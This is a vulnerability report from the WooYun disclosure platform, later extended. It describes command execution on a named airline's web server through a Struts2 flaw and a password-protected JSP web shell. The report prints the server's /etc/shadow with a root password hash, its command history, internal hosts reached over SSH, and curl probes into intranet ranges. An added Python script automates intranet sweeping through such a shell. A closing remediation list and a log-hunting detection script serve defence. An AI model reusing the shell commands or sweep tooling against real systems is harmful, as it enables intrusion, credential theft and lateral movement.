WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
2016-04-19: Details reported to the vendor, awaiting vendor handling
2016-04-19: Vendor has confirmed; details disclosed to the vendor only
2016-04-29: Details disclosed to core white hats and domain experts
2016-05-09: Details disclosed to regular white hats
2016-05-19: Details disclosed to intern white hats
2016-06-03: Details disclosed to the public
When a man and a woman are together, the man should give way to the woman in everything. Take me for example: whatever I do, I let my girlfriend have her way. I let her do the laundry, let her cook, let her wash the dishes, let her tidy the room......
http://crew.9air.com:8080/9airweb/allUserMap.action
Struts2 command execution. Time to patch, kid.

http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/etc/shadow

root:$6$tt8sA3oimLmV/DQS$P2kOvG699Pl38HVdoxIU7z1BBJmTA5xjP87FS4T2VsCl42zq52UAhxhT1KyfGutLzjmZ5fZOmRFwr87CZyMlA.:16439:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
dbus:!!:16439::::::
vcsa:!!:16439::::::
rpc:!!:16439:0:99999:7:::
rtkit:!!:16439::::::
avahi-autoipd:!!:16439::::::
abrt:!!:16439::::::
rpcuser:!!:16439::::::
nfsnobody:!!:16439::::::
haldaemon:!!:16439::::::
gdm:!!:16439::::::
ntp:!!:16439::::::
saslauth:!!:16439::::::
postfix:!!:16439::::::
pulse:!!:16439::::::
sshd:!!:16439::::::
tcpdump:!!:16439::::::
clamav:!!:16829::::::
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=whoami

root

Root privileges.
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=ls%20/

bin boot dev etc history.log home lib lib64 logs lost+found media misc net opt proc root sbin selinux serverdir
shirodemo.log
shirodemo.log.2016-01-29 shirodemo.log.2016-01-30 shirodemo.log.2016-01-31
shirodemo.log.2016-02-01 shirodemo.log.2016-02-02 shirodemo.log.2016-02-03 shirodemo.log.2016-02-04 shirodemo.log.2016-02-05 shirodemo.log.2016-02-06 shirodemo.log.2016-02-07 shirodemo.log.2016-02-08 shirodemo.log.2016-02-09 shirodemo.log.2016-02-10 shirodemo.log.2016-02-11 shirodemo.log.2016-02-12 shirodemo.log.2016-02-13 shirodemo.log.2016-02-14 shirodemo.log.2016-02-15 shirodemo.log.2016-02-16 shirodemo.log.2016-02-17 shirodemo.log.2016-02-18 shirodemo.log.2016-02-19 shirodemo.log.2016-02-20 shirodemo.log.2016-02-21 shirodemo.log.2016-02-22 shirodemo.log.2016-02-23 shirodemo.log.2016-02-24 shirodemo.log.2016-02-25 shirodemo.log.2016-02-26 shirodemo.log.2016-02-27 shirodemo.log.2016-02-28 shirodemo.log.2016-02-29
shirodemo.log.2016-03-01 shirodemo.log.2016-03-02 shirodemo.log.2016-03-03 shirodemo.log.2016-03-04 shirodemo.log.2016-03-05 shirodemo.log.2016-03-06 shirodemo.log.2016-03-07 shirodemo.log.2016-03-08 shirodemo.log.2016-03-09 shirodemo.log.2016-03-10 shirodemo.log.2016-03-11 shirodemo.log.2016-03-12 shirodemo.log.2016-03-13 shirodemo.log.2016-03-14 shirodemo.log.2016-03-15 shirodemo.log.2016-03-16 shirodemo.log.2016-03-17 shirodemo.log.2016-03-18 shirodemo.log.2016-03-19 shirodemo.log.2016-03-20 shirodemo.log.2016-03-21 shirodemo.log.2016-03-22 shirodemo.log.2016-03-23 shirodemo.log.2016-03-24 shirodemo.log.2016-03-25 shirodemo.log.2016-03-26 shirodemo.log.2016-03-27 shirodemo.log.2016-03-28 shirodemo.log.2016-03-29 shirodemo.log.2016-03-30 shirodemo.log.2016-03-31
shirodemo.log.2016-04-01 shirodemo.log.2016-04-02 shirodemo.log.2016-04-03 shirodemo.log.2016-04-04 shirodemo.log.2016-04-05 shirodemo.log.2016-04-06 shirodemo.log.2016-04-07 shirodemo.log.2016-04-08 shirodemo.log.2016-04-09 shirodemo.log.2016-04-10 shirodemo.log.2016-04-11 shirodemo.log.2016-04-12 shirodemo.log.2016-04-13 shirodemo.log.2016-04-14 shirodemo.log.2016-04-15 shirodemo.log.2016-04-16 shirodemo.log.2016-04-17 shirodemo.log.2016-04-18
soft software srv sys tmp usr var weixin
There is a command-history file as well:
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/history.log
Now this gets interesting.....

  414 select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist inner join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier and inf.o_flt_no = oolist.o_flt_no and inf.o_flt_org_apt = oolist.o_flt_org_apt and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1 and inf.o_flt_id = ? and inf.o_flt_leg_th = ? and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender
  415 2015-12-09 16:16:56,603 DEBUG [java.sql.PreparedStatement] - {pstm-100145} Executing Statement: select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist inner join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier and inf.o_flt_no = oolist.o_flt_no and inf.o_flt_org_apt = oolist.o_flt_org_apt and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1 and inf.o_flt_id = ? and inf.o_flt_leg_th = ? and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender
  416 [DEBUG] 2015-12-09 16:16:56,603 - {pstm-100145} Executing Statement: select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist inner join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier and inf.o_flt_no = oolist.o_flt_no and inf.o_flt_org_apt = oolist.o_flt_org_apt and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1 and inf.o_flt_id = ? and inf.o_flt_leg_th = ? and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender 3171526575
  417 tail -f catalina.out

SQL and the like; keeping it, it might come in handy later....

  754 ssh [email protected]
  756 ssh [email protected]

The intranet looks fairly large.

  829 cd /
  830 ls
  831 cd /serverdir/
  832 ls
  833 cd tomcat/
  834 ls
  835 cd apache-tomcat-7.0.57/
  836 ls
  837 cd webapps/
  838 ls
  839 cd test/
  840 ls
  841 cd ..
  842 rm -rf test
  843 ls
  844 cd 9airweb
  845 ls
  846 cat return_url.jsp
  847 ll
  848 cat index_hd.jsp

So the web directory is here. And how did SafeDog end up installed?

  877 tar -zxvf safedog_linux64.tar.gz
  878 ll
  879 cd safedog_linux64
  880 ls
  881 python install.py
  882 service safedog status
  883 python install.py
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/shirodemo.log.2016-04-15
These are all database logs.
I had a look at hosts; there are no intranet IPs in there. So far I have only collected two ranges, 10.10.2.x and 192.168.34.x, but by the look of it the intranet is large. Keep probing. I had meant to use find to list every file in your directories... never mind.... Let's go straight to the crude way of probing the intranet: curl.

http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.24
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.25
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.31
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.14
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.15
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.17
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.42
It works!
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.46
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.36
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.52/wechat/WEB-INF/web.xml
Found a useless xml. I'll write a little script to run through the rest.
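The probing above is done by hand, one curl per host, through the command-execution endpoint. The following is an added example, not the reporter's script, of what such a sweep looks like when automated. It assumes an endpoint of the shape shown in this report (a JSP taking pwd=<password> and i=<command>) that returns the command's output as the response body; the endpoint URL, password and ranges in the main block are placeholders, and the rule that a non-empty body not starting with "curl:" means the target answered is an assumption about how the endpoint relays stdout and stderr. Unlike the bare curl in the report, the command carries -m so that a silent host cannot stall the whole sweep.

```python
"""Sweep intranet ranges through a command-execution web endpoint.

Added example; this is not the reporter's script. It assumes an endpoint of
the shape the report shows (?pwd=<password>&i=<command>) that returns the
command's output as the response body. The endpoint URL, password and ranges
in the main block are placeholders. Treating a non-empty body that is not a
curl error message as "host answered" is an assumption about how the
endpoint relays stdout/stderr.
"""
import ipaddress
from urllib.error import URLError
from urllib.parse import quote, urlencode
from urllib.request import urlopen


def build_probe_url(shell_url, password, target, curl_timeout=3):
    """URL that makes the compromised host curl `target` and echo the result.

    -m bounds curl's total run time so a silent host cannot stall the sweep;
    -sS drops the progress meter but keeps error messages.
    """
    cmd = f"curl -m {curl_timeout} -sS {target}"
    # quote_via=quote encodes spaces as %20, as in the report's URLs, not '+'
    return f"{shell_url}?{urlencode({'pwd': password, 'i': cmd}, quote_via=quote)}"


def http_get(url, timeout=10):
    """Fetch a URL and return the body as text; any network failure yields ''."""
    try:
        with urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except (URLError, OSError):
        return ""


def looks_alive(body):
    """Decide from the relayed curl output whether the target answered."""
    text = body.strip()
    if not text:
        return False
    # If the endpoint also relays stderr, a refused or timed-out host shows up
    # as 'curl: (7) Failed to connect ...' or 'curl: (28) ...'; that is dead.
    return not text.startswith("curl:")


def sweep(shell_url, password, networks, fetch=http_get):
    """Return {ip: first line of the response} for every host that answered."""
    alive = {}
    for net in networks:
        for ip in ipaddress.ip_network(net, strict=False).hosts():
            body = fetch(build_probe_url(shell_url, password, str(ip)))
            if looks_alive(body):
                alive[str(ip)] = body.strip().splitlines()[0][:80]
    return alive


if __name__ == "__main__":
    # Placeholders: point these at an endpoint you are authorised to test.
    found = sweep("http://target.example:8080/app/shell.jsp", "changeme",
                  ["10.10.2.0/24", "192.168.34.0/24"])
    for ip, banner in sorted(found.items()):
        print(f"{ip}\t{banner}")
```

The fetch function is injected so the sweep logic can be exercised against canned responses before it is pointed at a live endpoint; the first response line kept per host is usually enough to tell an HTTP banner from an XML document or an error page.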
1. Patch.
2. Delete that command-history file.
3. Check the system logs to see whether attackers have already been in.
4. Don't hold back: EQ the ops team into the air and pummel them.
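Item 3 is the one a defender can act on right away, and the report shows exactly what to look for: a JSP that takes pwd= and i= with a shell command as the value, and a Struts2 .action URL. Below is an added example, not from the report, of a hunt over Tomcat access-log lines for those two request shapes. The log lines are constructed in Tomcat's common access-log pattern, not real traffic; the indicator lists are a starting set of assumptions, not a complete signature; and because only the request line reaches the access log, payloads carried in POST bodies or headers (as several Struts2 bugs allow) will not be caught this way.

```python
"""Hunt Tomcat access logs for web-shell and Struts2 OGNL command execution.

Added example, not from the report. SAMPLE_LOG is constructed in Tomcat's
common AccessLogValve pattern (%h %l %u %t "%r" %s %b); the indicator sets
are a starting point, not a complete signature, and only the query string
is visible here (POST bodies and headers never reach the access log).
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# First word of a parameter value that only makes sense as a shell command.
# 'id' is deliberately left out: it is a common legitimate parameter value.
SHELL_BINARIES = {"cat", "ls", "whoami", "uname", "curl", "wget",
                  "sh", "bash", "nc", "python", "perl"}

# OGNL markers seen in Struts2 exploitation attempts (assumed starting set).
OGNL_MARKERS = ("${", "%{", "#_memberAccess", "#context",
                "java.lang.Runtime", "ProcessBuilder")


def parse_line(line):
    """Split one access-log line into its fields; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = entry.pop("req").split(" ")
    if len(parts) < 2:
        return None
    entry["method"], entry["target"] = parts[0], parts[1]
    return entry


def classify(target):
    """Return the reasons a request target looks like command execution ([] if clean)."""
    parsed = urlparse(target)
    params = parse_qs(parsed.query, keep_blank_values=True)
    reasons = []
    # Shape 1: a JSP taking pwd= and i= (a password-gated command parameter).
    if parsed.path.endswith(".jsp") and {"pwd", "i"}.issubset(params):
        reasons.append("jsp-shell-params")
    # Shape 2: any parameter value whose first word is a shell binary.
    for values in params.values():
        for value in values:
            first = value.strip().split(" ", 1)[0]
            if first in SHELL_BINARIES:
                reasons.append(f"shell-command:{first}")
    # Shape 3: a Struts2 action URL carrying OGNL syntax after URL-decoding.
    if parsed.path.endswith(".action") and any(mk in unquote_plus(target) for mk in OGNL_MARKERS):
        reasons.append("struts2-ognl")
    return reasons


def hunt(lines):
    """Return the flagged entries, each with the reasons it was flagged."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry["target"])
        if reasons:
            entry["reasons"] = reasons
            hits.append(entry)
    return hits


# Constructed sample, not real traffic: one OGNL-style .action request, two
# shell invocations of the kind the report shows, and two benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Apr/2016:10:19:02 +0800] "GET /9airweb/allUserMap.action?redirect:%24%7Bnew%20java.lang.ProcessBuilder(%27whoami%27).start()%7D HTTP/1.1" 302 0',
    '10.0.0.9 - - [15/Apr/2016:10:20:11 +0800] "GET /9airweb/index_hd.jsp HTTP/1.1" 200 5120',
    '10.0.0.5 - - [15/Apr/2016:10:21:07 +0800] "GET /9airweb/guige.jsp?pwd=222&i=cat%20/etc/shadow HTTP/1.1" 200 2314',
    '10.0.0.9 - - [15/Apr/2016:10:22:12 +0800] "GET /9airweb/allUserMap.action?page=2 HTTP/1.1" 200 8800',
    '10.0.0.5 - - [15/Apr/2016:10:21:30 +0800] "GET /9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.24 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["target"], ", ".join(hit["reasons"]))
```

Run against real logs, feed the file's lines to hunt() and pivot on the source IP of anything flagged: the same client hitting the .action URL and then the JSP is the sequence this report describes, and the timestamps tell you how long the shell has been there.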
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-04-19 17:06
None yet